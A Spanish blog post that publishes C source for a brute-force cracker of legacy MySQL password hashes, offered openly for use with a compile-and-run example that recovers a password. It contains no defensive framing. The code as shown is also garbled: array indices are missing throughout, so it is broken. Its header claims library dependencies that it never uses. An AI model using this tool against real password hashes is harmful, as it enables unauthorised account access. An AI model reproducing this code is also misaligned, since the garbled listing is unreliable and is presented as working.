Etiquetas

C (31) Cpp (28) Linux (14) asm (8) Telegram (5) bot (5) libreria (5) Algoritmo (3) Errores comunes (3) python (3) Opengl (2) kali (2) Android (1) Snippet (1) nano (1) recursividad (1)

lunes, 13 de noviembre de 2023

[C] Crackeador mysql

 /*
* Esto es un rapido crakeador de fuerza bruta para hashed MySQL
*Se puede romper una contraseña de 8 caracteres que contiene todos
*los caracteres ASCII en cuestión de horas en un PC normal.
*Este programa es de dominio público. Compartir y disfrutar.
*

* Ejemplo:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* La contraseña de MySQL función hash se podría fortalecer considerablemente
*/
//Necesitas libssl y libpthread

#include <stdio.h>

typedef unsigned long u32;

/* Caracteres permitidos en la contraseña; 33-126 es imprimible ASCII */
#define MIN_CHAR 33
#define MAX_CHAR 126

/* La longitud máxima de la contraseña */
#define MAX_LEN 12
#define MASK 0x7fffffffL

int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary){
int i, c;
u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
u32 newstate1, newstate2, newstate3;
u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
i = -1;
sum = 7;
state1_ary[0] = 1345345333L;
state2_ary[0] = 0x12345671L;

while (1) {
while (i < stop) {
i++;
pass_ary = MIN_CHAR;
step_ary = (state1_ary & 0x3f) + sum;
xor_ary  = step_ary*MIN_CHAR + (state1_ary << 8);
sum += MIN_CHAR;
state1_ary[i+1] = state1_ary ^ xor_ary;
state2_ary[i+1] = state2_ary
+ ((state2_ary << 8) ^ state1_ary[i+1]);
}

state1 = state1_ary[i+1];
state2 = state2_ary[i+1];
step = (state1 & 0x3f) + sum;
xor1 = step*MIN_CHAR + (state1 << 8);
xor2 = (state2 << 8) ^ state1;

for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
newstate2 = state2 + (xor1 ^ xor2);
newstate1 = state1 ^ xor1;

newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
div  = (newstate1 & 0x3f) + sum + c;
diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
if (diff % div != 0) continue;
d = diff / div;
if (d < MIN_CHAR || d > MAX_CHAR) continue;

div  = (newstate3 & 0x3f) + sum + c + d;
diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
if (diff % div != 0) continue;
e = diff / div;
if (e < MIN_CHAR || e > MAX_CHAR) continue;

pass_ary[i+1] = c;
pass_ary[i+2] = d;
pass_ary[i+3] = e;
return 1;
}

while (i >= 0 && pass_ary >= MAX_CHAR) {
sum -= MAX_CHAR;
i--;
}
if (i < 0) break;
pass_ary++;
xor_ary += step_ary;
sum++;
state1_ary[i+1] = state1_ary ^ xor_ary;
state2_ary[i+1] = state2_ary
+ ((state2_ary << 8) ^ state1_ary[i+1]);
}

return 0;
}

void crack(char *hash){
int i, len;
u32 targ1, targ2, targ3;
int pass[MAX_LEN];

if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
printf("Invalid password hash: %s\n", hash);
return;
}
printf("Hash: %08lx%08lx\n", targ1, targ2);
targ3 = targ2 - targ1;
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);

for (len = 3; len <= MAX_LEN; len++) {
printf("Trying length %d\n", len);
if ( crack0(len-4, targ1, targ3, pass) ) {
printf("Found pass: ");
for (i = 0; i < len; i++)
putchar(pass);
putchar('\n');
break;
}
}
if (len > MAX_LEN)
printf("Pass not found\n");
}

int main(int argc, char *argv[]){
int i;
if (argc <= 1) printf("usage: %s hash\n", argv[0]);
for (i = 1; i < argc; i++) crack(argv);
return 0;
}

No hay comentarios.:

Publicar un comentario